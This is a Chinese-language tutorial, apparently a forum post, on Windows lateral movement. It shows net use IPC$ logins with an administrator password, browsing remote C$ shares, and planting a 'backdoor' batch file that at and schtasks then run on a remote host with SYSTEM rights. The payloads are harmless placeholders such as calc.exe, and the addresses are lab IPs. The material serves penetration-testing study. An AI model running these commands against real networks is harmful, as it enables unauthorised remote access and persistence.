（一）内网横向移动-常用windows连接相关命令-建立IPC共享

本章目标
1. 常用windows连接相关命令
2. Windows系统散列值获取分析
3. 哈希传递攻击分析aes hash（ntlm）tickets list
4. 票据传递攻击分析
5. PsExec的使用
6. Wmic的使用
7. Smbexec的使用
8. DCOM在远程系统中的使用
9. SPN在域环境中的应用

1、常用widows连接相关命令
1)、windows远程连接
mstsc    远程桌面
vnc       远程桌面
ipc       ipc$共享
…
2)、IPC利用条件：
1、开启了139、445端口
2、管理员开启了默认共享

3)、开启ipc共享
a：查看共享

1. net share ipc$

复制代码

b：建立共享

1. net use \\192.168.159.200\ipc$ "ctf8.com" /user:administrator

复制代码

c：查看共享

1. net use

复制代码

d：查看远程主机进程运行情况

1. tasklist /s 192.168.159.200

复制代码

e：查看远程主机当前时间

1. net time \\192.168.159.200

复制代码

f：查看C盘下面共享的文件

1. dir \\192.168.159.100\c$

复制代码

g：查看C盘某个路径下的文件

1. dir \\192.168.159.100\c$\Users\Administrator\Desktop

复制代码

4）添加后门可执行程序

向远程主机定时任务添加后门
以windows7共计windows2003为例：
命令介绍：

1. 1、创建bat文件 calc.bat：文件内容为 start calc.exe
   
2. 2、copy calc.bat \\192.168.63.131\c$
   
3. 3、at \\192.168.63.131 21:41 c:\calc.bat

复制代码

查看windows2003的进程列表



其他命令

1. at \\192.168.159.154 14:56 cmd.exe /c "ipconfig>c:/111.txt"

复制代码

还可以使用：

1. type \\192.168.159.154\c$\111.txt

复制代码

如果是新版本操作系统，比如是windows2012，那么at命令给飞起，需要是用schtasks替代at添加计划任务命令：

1. /create 创建 /s 远端 /tn任务名 /sc 计划类型 /tr执行内容 /ru 执行权限 /f强制

复制代码

创建一个任务，打开计算器

1. schtasks /create /s 192.168.159.100 /tn test /sc onstart /tr calc.exe /ru system /f

复制代码

激活计划任务：

1. schtasks /run /s 192.168.159.100 /tn "test"

复制代码

删除计划任务：

1. schtasks /delete /s 192.168.159.100 /tn "test" /f

复制代码

删除ipc连接：

1. net use \\192.168.63.131\ipc$ /del

复制代码

计划任务会产生日志，存储位置为：

1. C:\windows\task\SchedLgU.txt
   

复制代码